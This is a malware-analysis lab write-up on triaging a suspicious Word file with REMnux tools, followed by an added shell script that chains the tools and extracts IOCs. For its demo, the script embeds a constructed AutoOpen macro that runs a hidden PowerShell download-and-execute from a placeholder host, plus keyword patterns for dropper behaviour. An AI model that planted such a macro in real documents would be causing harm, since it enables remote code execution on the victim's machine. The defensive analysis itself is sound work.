Perform a malware analysis on the provided file baddoc.doc using REMnux tools.

Identify Indicators of Compromise (IOCs) and suspicious macros, and generate a short analysis report.

Archive password - Malware

unzip malware_office.zip


To extract file metadata (author, company, creation/modification times, application that produced the file):

exiftool baddoc.doc


To extract the creation/modification timestamps of each OLE stream and storage (useful for spotting streams added after the document was first authored):

oletimes baddoc.doc 


Download YARA Rules (Community Rules)

git clone https://github.com/Yara-Rules/rules.git community-rules


yara -w ~/community-rules/index.yar baddoc.doc (-w suppresses compiler warnings so the rule hits are easier to read; index.yar pulls in the whole rule set, so expect generic Office/macro rules alongside family-specific ones)


Commands:
oleid baddoc.doc (quick triage indicators: file type, presence of VBA macros, encryption, external relationships)
olevba -c baddoc.doc > baddoc.vba (-c dumps only the raw VBA source, without analysis, redirected to an external file)
olevba --deobf --reveal baddoc.doc > baddoc.vba (--deobf attempts to deobfuscate strings; --reveal prints the source with obfuscated strings replaced by their decoded values. This overwrites the file from the previous command, so redirect to a different name if both versions are wanted for the report.)
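The commands above are one procedure: collect metadata and timestamps, run the YARA index, recover the VBA, then pull IOCs and a verdict out of it for the report. The script below is an added example that chains them in that order; it is not part of the original lab notes or of REMnux. It assumes the oletools and yara binaries are on PATH when installed (missing ones are skipped), that the community rules were cloned to ~/community-rules as above, and it embeds a constructed dropper-style macro (not the contents of baddoc.doc) so the IOC extraction and verdict logic can be exercised offline.

```shell
#!/bin/sh
# Added example (not part of the original lab notes): chains the REMnux
# commands from this write-up into one triage run and pulls network IOCs
# and a verdict out of the recovered VBA. Assumptions: oletools/yara are on
# PATH when present, the community rules live in ~/community-rules, and the
# sample macro below is constructed for demonstration, not from baddoc.doc.

SAMPLE="${1:-baddoc.doc}"
REPORT_DIR="${2:-report}"

# Print each unique network IOC found in text on stdin, one per line:
# full URLs, bare IPv4 addresses, and hostnames ending in a common TLD.
extract_iocs() {
    grep -oE 'https?://[A-Za-z0-9./?=_%:&-]+|([0-9]{1,3}\.){3}[0-9]{1,3}|[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.(com|net|org|ru|info|top|xyz)' \
        | sort -u
}

# Classify VBA on stdin: an auto-exec entry point combined with an
# execution/download primitive is the classic dropper pattern that
# olevba also reports as AutoExec plus Suspicious keywords.
triage_verdict() {
    src=$(cat)
    trigger=0
    runner=0
    printf '%s\n' "$src" | grep -qiE 'AutoOpen|Document_Open|AutoExec|Workbook_Open' && trigger=1
    printf '%s\n' "$src" | grep -qiE 'CreateObject|WScript\.Shell|\.Run|Shell\(|powershell|URLDownloadToFile|XMLHTTP|DownloadString' && runner=1
    if [ "$trigger" -eq 1 ] && [ "$runner" -eq 1 ]; then
        echo "SUSPICIOUS"
    else
        echo "no auto-exec + runner pair found"
    fi
}

# Constructed sample macro for the stand-alone demo (not from baddoc.doc).
sample_vba() {
    cat <<'EOF'
' constructed dropper-style macro, not real sample code
Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    url = "http://update-check.example.com/payload.exe"
    ip = "198.51.100.23"
    objShell.Run "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('" & url & "')", 0
End Sub
EOF
}

# Run whichever of the write-up's tools are installed and collect output
# under $REPORT_DIR; skip any that are missing rather than aborting.
run_triage() {
    mkdir -p "$REPORT_DIR"
    for tool in exiftool oletimes oleid; do
        if command -v "$tool" >/dev/null 2>&1; then
            "$tool" "$SAMPLE" > "$REPORT_DIR/$tool.txt" 2>&1
        else
            echo "[-] $tool not found, skipping"
        fi
    done
    if command -v olevba >/dev/null 2>&1; then
        olevba --deobf --reveal "$SAMPLE" > "$REPORT_DIR/baddoc.vba" 2>&1
        extract_iocs < "$REPORT_DIR/baddoc.vba" > "$REPORT_DIR/iocs.txt"
        echo "[+] verdict: $(triage_verdict < "$REPORT_DIR/baddoc.vba")"
    fi
    if command -v yara >/dev/null 2>&1 && [ -f "${HOME:-.}/community-rules/index.yar" ]; then
        yara -w "${HOME:-.}/community-rules/index.yar" "$SAMPLE" > "$REPORT_DIR/yara.txt" 2>&1
    fi
}

# Only run the real tools when a sample path is given; with no arguments the
# functions are just defined (demo: sample_vba | extract_iocs).
if [ $# -gt 0 ]; then
    run_triage
fi
```

Run it on the REMnux box as `sh triage.sh baddoc.doc report`; the per-tool output lands in report/ and iocs.txt holds the deduplicated URLs, IPs and hostnames to paste into the report. The regexes are deliberately simple: they only catch indicators that appear in clear text in the olevba output, so anything still hidden behind Chr()/StrReverse/Base64 after --deobf has to be decoded by hand and added separately.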